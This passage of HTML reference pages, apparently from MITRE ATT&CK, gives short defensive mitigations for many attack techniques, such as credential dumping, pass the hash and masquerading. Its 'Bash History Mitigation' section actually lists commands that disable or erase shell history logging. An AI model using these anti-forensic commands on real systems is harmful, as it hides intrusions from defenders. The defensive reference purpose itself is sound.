<p>Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.</p>
</div>
</div>
<div class="sect2">
<h3 id="_office_application_startup_mitigation"><a class="anchor" href="#_office_application_startup_mitigation"></a><a class="link" href="#_office_application_startup_mitigation">Office Application Startup Mitigation</a></h3>
<div class="paragraph">
<p>Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Even setting to disable with notification could enable unsuspecting users to execute potentially malicious macros.[[CiteRef::TechNet Office Macro Security]]</p>
</div>
<div class="paragraph">
<p>For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring [[Privilege Escalation]].[[CiteRef::Palo Alto Office Test Sofacy]]</p>
</div>
<div class="paragraph">
<p>Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing.[[CiteRef::MRWLabs Office Persistence Add-ins]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_bash_history_mitigation"><a class="anchor" href="#_bash_history_mitigation"></a><a class="link" href="#_bash_history_mitigation">Bash History Mitigation</a></h3>
<div class="paragraph">
<p>There are multiple methods of preventing a user&#8217;s command history from being flushed to their .bash_history file, including use of the following commands:
&lt;code&gt;set +o history&lt;/code&gt; and &lt;code&gt;set -o history&lt;/code&gt; to start logging again;
&lt;code&gt;unset HISTFILE&lt;/code&gt; being added to a user&#8217;s .bash_rc file; and
&lt;code&gt;ln -s /dev/null ~/.bash_history&lt;/code&gt; to write commands to &lt;code&gt;/dev/null&lt;/code&gt;instead.</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_window_discovery_mitigation"><a class="anchor" href="#_application_window_discovery_mitigation"></a><a class="link" href="#_application_window_discovery_mitigation">Application Window Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_private_keys_mitigation"><a class="anchor" href="#_private_keys_mitigation"></a><a class="link" href="#_private_keys_mitigation">Private Keys Mitigation</a></h3>
<div class="paragraph">
<p>Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [[Technique/T1078|Valid Accounts]].</p>
</div>
</div>
<div class="sect2">
<h3 id="_source_mitigation"><a class="anchor" href="#_source_mitigation"></a><a class="link" href="#_source_mitigation">Source Mitigation</a></h3>
<div class="paragraph">
<p>Due to potential legitimate uses of source commands, it&#8217;s may be difficult to mitigate use of this technique.</p>
</div>
</div>
<div class="sect2">
<h3 id="_histcontrol_mitigation"><a class="anchor" href="#_histcontrol_mitigation"></a><a class="link" href="#_histcontrol_mitigation">HISTCONTROL Mitigation</a></h3>
<div class="paragraph">
<p>Prevent users from changing the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable[[CiteRef::Securing bash history]]. Also, make sure that the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is set to “ignoredup” instead of “ignoreboth” or “ignorespace”.</p>
</div>
</div>
<div class="sect2">
<h3 id="_external_remote_services_mitigation"><a class="anchor" href="#_external_remote_services_mitigation"></a><a class="link" href="#_external_remote_services_mitigation">External Remote Services Mitigation</a></h3>
<div class="paragraph">
<p>Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through uses of network proxies, gateways, and firewalls as appropriate. Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary&#8217;s ability to leverage stolen credentials, but be aware of [[Technique/T1111|Two-Factor Authentication Interception]] techniques for some two-factor authentication implementations.</p>
</div>
</div>
<div class="sect2">
<h3 id="_lc_main_hijacking_mitigation"><a class="anchor" href="#_lc_main_hijacking_mitigation"></a><a class="link" href="#_lc_main_hijacking_mitigation">LC_MAIN Hijacking Mitigation</a></h3>
<div class="paragraph">
<p>Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.</p>
</div>
</div>
<div class="sect2">
<h3 id="_pass_the_hash_mitigation"><a class="anchor" href="#_pass_the_hash_mitigation"></a><a class="link" href="#_pass_the_hash_mitigation">Pass the Hash Mitigation</a></h3>
<div class="paragraph">
<p>Monitor systems and domain logs for unusual credential logon activity. Prevent access to [[Technique/T1078|Valid Accounts]]. Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group. Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary&#8217;s ability to perform [[Lateral Movement]] between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_account_discovery_mitigation"><a class="anchor" href="#_account_discovery_mitigation"></a><a class="link" href="#_account_discovery_mitigation">Account Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_trap_mitigation"><a class="anchor" href="#_trap_mitigation"></a><a class="link" href="#_trap_mitigation">Trap Mitigation</a></h3>
<div class="paragraph">
<p>Due to potential legitimate uses of trap commands, it&#8217;s may be difficult to mitigate use of this technique.</p>
</div>
</div>
<div class="sect2">
<h3 id="_trusted_developer_utilities_mitigation"><a class="anchor" href="#_trusted_developer_utilities_mitigation"></a><a class="link" href="#_trusted_developer_utilities_mitigation">Trusted Developer Utilities Mitigation</a></h3>
<div class="paragraph">
<p>MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe may not be necessary within a given environment and should be removed if not used.</p>
</div>
<div class="paragraph">
<p>Use application whitelisting configured to block execution of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe if they are not required for a given system or network to prevent potential misuse by adversaries.[[CiteRef::Microsoft GitHub Device Guard CI Policies]][[CiteRef::Exploit Monday Mitigate Device Guard Bypases]][[CiteRef::GitHub mattifestation DeviceGuardBypass]][[CiteRef::SubTee MSBuild]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_pass_the_ticket_mitigation"><a class="anchor" href="#_pass_the_ticket_mitigation"></a><a class="link" href="#_pass_the_ticket_mitigation">Pass the Ticket Mitigation</a></h3>
<div class="paragraph">
<p>Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.[[CiteRef::ADSecurity AD Kerberos Attacks]]</p>
</div>
<div class="paragraph">
<p>For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.[[CiteRef::CERT-EU Golden Ticket Protection]]</p>
</div>
<div class="paragraph">
<p>Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_owner_user_discovery_mitigation"><a class="anchor" href="#_system_owner_user_discovery_mitigation"></a><a class="link" href="#_system_owner_user_discovery_mitigation">System Owner/User Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_credential_dumping_mitigation"><a class="anchor" href="#_credential_dumping_mitigation"></a><a class="link" href="#_credential_dumping_mitigation">Credential Dumping Mitigation</a></h3>
<div class="paragraph">
<p>Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [[Technique/T1078|Valid Accounts]] if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.[[CiteRef::Microsoft LSA]]</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to dump credentials by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
<div class="paragraph">
<p>With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements.[[CiteRef::TechNet Credential Guard]] It also does not protect against all forms of credential dumping.[[CiteRef::GitHub SHB Credential Guard]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_regsvr32_mitigation"><a class="anchor" href="#_regsvr32_mitigation"></a><a class="link" href="#_regsvr32_mitigation">Regsvr32 Mitigation</a></h3>
<div class="paragraph">
<p>Microsoft&#8217;s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting.[[CiteRef::Secure Host Baseline EMET]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_process_hollowing_mitigation"><a class="anchor" href="#_process_hollowing_mitigation"></a><a class="link" href="#_process_hollowing_mitigation">Process Hollowing Mitigation</a></h3>
<div class="paragraph">
<p>Mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</p>
</div>
<div class="paragraph">
<p>Although process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions, including process hollowing, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_sudo_mitigation"><a class="anchor" href="#_sudo_mitigation"></a><a class="link" href="#_sudo_mitigation">Sudo Mitigation</a></h3>
<div class="paragraph">
<p>The sudoers file should be strictly edited such that passwords are always required and that users cant spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.</p>
</div>
</div>
<div class="sect2">
<h3 id="_rc_common_mitigation"><a class="anchor" href="#_rc_common_mitigation"></a><a class="link" href="#_rc_common_mitigation">Rc.common Mitigation</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts so only authorized users can edit the rc.common file.</p>
</div>
</div>
<div class="sect2">
<h3 id="_execution_through_api_mitigation"><a class="anchor" href="#_execution_through_api_mitigation"></a><a class="link" href="#_execution_through_api_mitigation">Execution through API Mitigation</a></h3>
<div class="paragraph">
<p>Mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior. Audit and/or block potentially malicious software by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_taint_shared_content_mitigation"><a class="anchor" href="#_taint_shared_content_mitigation"></a><a class="link" href="#_taint_shared_content_mitigation">Taint Shared Content Mitigation</a></h3>
<div class="paragraph">
<p>Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).</p>
</div>
<div class="paragraph">
<p>Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_redundant_access_mitigation"><a class="anchor" href="#_redundant_access_mitigation"></a><a class="link" href="#_redundant_access_mitigation">Redundant Access Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_audio_capture_mitigation"><a class="anchor" href="#_audio_capture_mitigation"></a><a class="link" href="#_audio_capture_mitigation">Audio Capture Mitigation</a></h3>
<div class="paragraph">
<p>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to record audio by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_new_service_mitigation"><a class="anchor" href="#_new_service_mitigation"></a><a class="link" href="#_new_service_mitigation">New Service Mitigation</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate [[Privilege Escalation]] vectors so only authorized administrators can create new services.</p>
</div>
<div class="paragraph">
<p>Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_scripting_mitigation"><a class="anchor" href="#_scripting_mitigation"></a><a class="link" href="#_scripting_mitigation">Scripting Mitigation</a></h3>
<div class="paragraph">
<p>Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.</p>
</div>
</div>
<div class="sect2">
<h3 id="_rundll32_mitigation"><a class="anchor" href="#_rundll32_mitigation"></a><a class="link" href="#_rundll32_mitigation">Rundll32 Mitigation</a></h3>
<div class="paragraph">
<p>Microsoft&#8217;s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting.[[CiteRef::Secure Host Baseline EMET]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_fallback_channels_mitigation"><a class="anchor" href="#_fallback_channels_mitigation"></a><a class="link" href="#_fallback_channels_mitigation">Fallback Channels Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_hidden_window_mitigation"><a class="anchor" href="#_hidden_window_mitigation"></a><a class="link" href="#_hidden_window_mitigation">Hidden Window Mitigation</a></h3>
<div class="paragraph">
<p>Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_service_discovery_mitigation"><a class="anchor" href="#_system_service_discovery_mitigation"></a><a class="link" href="#_system_service_discovery_mitigation">System Service Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_indicator_removal_on_host_mitigation"><a class="anchor" href="#_indicator_removal_on_host_mitigation"></a><a class="link" href="#_indicator_removal_on_host_mitigation">Indicator Removal on Host Mitigation</a></h3>
<div class="paragraph">
<p>Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.</p>
</div>
</div>
<div class="sect2">
<h3 id="_service_registry_permissions_weakness_mitigation"><a class="anchor" href="#_service_registry_permissions_weakness_mitigation"></a><a class="link" href="#_service_registry_permissions_weakness_mitigation">Service Registry Permissions Weakness Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through service abuse by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_timestomp_mitigation"><a class="anchor" href="#_timestomp_mitigation"></a><a class="link" href="#_timestomp_mitigation">Timestomp Mitigation</a></h3>
<div class="paragraph">
<p>Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_network_configuration_discovery_mitigation"><a class="anchor" href="#_system_network_configuration_discovery_mitigation"></a><a class="link" href="#_system_network_configuration_discovery_mitigation">System Network Configuration Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system&#8217;s network configuration, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_execution_through_module_load_mitigation"><a class="anchor" href="#_execution_through_module_load_mitigation"></a><a class="link" href="#_execution_through_module_load_mitigation">Execution through Module Load Mitigation</a></h3>
<div class="paragraph">
<p>Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.</p>
</div>
</div>
<div class="sect2">
<h3 id="_shared_webroot_mitigation"><a class="anchor" href="#_shared_webroot_mitigation"></a><a class="link" href="#_shared_webroot_mitigation">Shared Webroot Mitigation</a></h3>
<div class="paragraph">
<p>Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.</p>
</div>
<div class="paragraph">
<p>Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_scheduled_task_mitigation"><a class="anchor" href="#_scheduled_task_mitigation"></a><a class="link" href="#_scheduled_task_mitigation">Scheduled Task Mitigation</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate [[Privilege Escalation]] vectors so only authorized administrators can create scheduled tasks. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges.<a id="CiteRef::Powersploit"></a></p>
</div>
<div class="paragraph">
<p>Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_binary_padding_mitigation"><a class="anchor" href="#_binary_padding_mitigation"></a><a class="link" href="#_binary_padding_mitigation">Binary Padding Mitigation</a></h3>
<div class="paragraph">
<p>Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_sniffing_mitigation"><a class="anchor" href="#_network_sniffing_mitigation"></a><a class="link" href="#_network_sniffing_mitigation">Network Sniffing Mitigation</a></h3>
<div class="paragraph">
<p>Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_encrypted_mitigation"><a class="anchor" href="#_data_encrypted_mitigation"></a><a class="link" href="#_data_encrypted_mitigation">Data Encrypted Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_standard_cryptographic_protocol_mitigation"><a class="anchor" href="#_standard_cryptographic_protocol_mitigation"></a><a class="link" href="#_standard_cryptographic_protocol_mitigation">Standard Cryptographic Protocol Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_multilayer_encryption_mitigation"><a class="anchor" href="#_multilayer_encryption_mitigation"></a><a class="link" href="#_multilayer_encryption_mitigation">Multilayer Encryption Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_masquerading_mitigation"><a class="anchor" href="#_masquerading_mitigation"></a><a class="link" href="#_masquerading_mitigation">Masquerading Mitigation</a></h3>
<div class="paragraph">
<p>When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.</p>
</div>
<div class="paragraph">
<p>Identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_system_logical_offsets_mitigation"><a class="anchor" href="#_file_system_logical_offsets_mitigation"></a><a class="link" href="#_file_system_logical_offsets_mitigation">File System Logical Offsets Mitigation</a></h3>
<div class="paragraph">
<p>Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_launch_agent_mitigation"><a class="anchor" href="#_launch_agent_mitigation"></a><a class="link" href="#_launch_agent_mitigation">Launch Agent Mitigation</a></h3>
<div class="paragraph">
<p>Restrict user&#8217;s abilities to create Launch Agents with group policy.</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_services_mitigation"><a class="anchor" href="#_remote_services_mitigation"></a><a class="link" href="#_remote_services_mitigation">Remote Services Mitigation</a></h3>
<div class="paragraph">
<p>Limit the number of accounts that may use remote services. Use multifactor authentication where possible. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs. Prevent [[Credential Access]] techniques that may allow an adversary to acquire [[Technique/T1078|Valid Accounts]] that can be used by existing services.</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_deletion_mitigation"><a class="anchor" href="#_file_deletion_mitigation"></a><a class="link" href="#_file_deletion_mitigation">File Deletion Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_compressed_mitigation"><a class="anchor" href="#_data_compressed_mitigation"></a><a class="link" href="#_data_compressed_mitigation">Data Compressed Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
<div class="paragraph">
<p>If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.</p>
</div>
</div>
<div class="sect2">
<h3 id="_lc_load_dylib_addition_mitigation"><a class="anchor" href="#_lc_load_dylib_addition_mitigation"></a><a class="link" href="#_lc_load_dylib_addition_mitigation">LC_LOAD_DYLIB Addition Mitigation</a></h3>
<div class="paragraph">
<p>Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasnt included as part of an update, it should be investigated.</p>
</div>
</div>
<div class="sect2">
<h3 id="_authentication_package_mitigation"><a class="anchor" href="#_authentication_package_mitigation"></a><a class="link" href="#_authentication_package_mitigation">Authentication Package Mitigation</a></h3>
<div class="paragraph">
<p>Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all DLLs loaded by LSA to be signed by Microsoft.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_startup_items_mitigation"><a class="anchor" href="#_startup_items_mitigation"></a><a class="link" href="#_startup_items_mitigation">Startup Items Mitigation</a></h3>
<div class="paragraph">
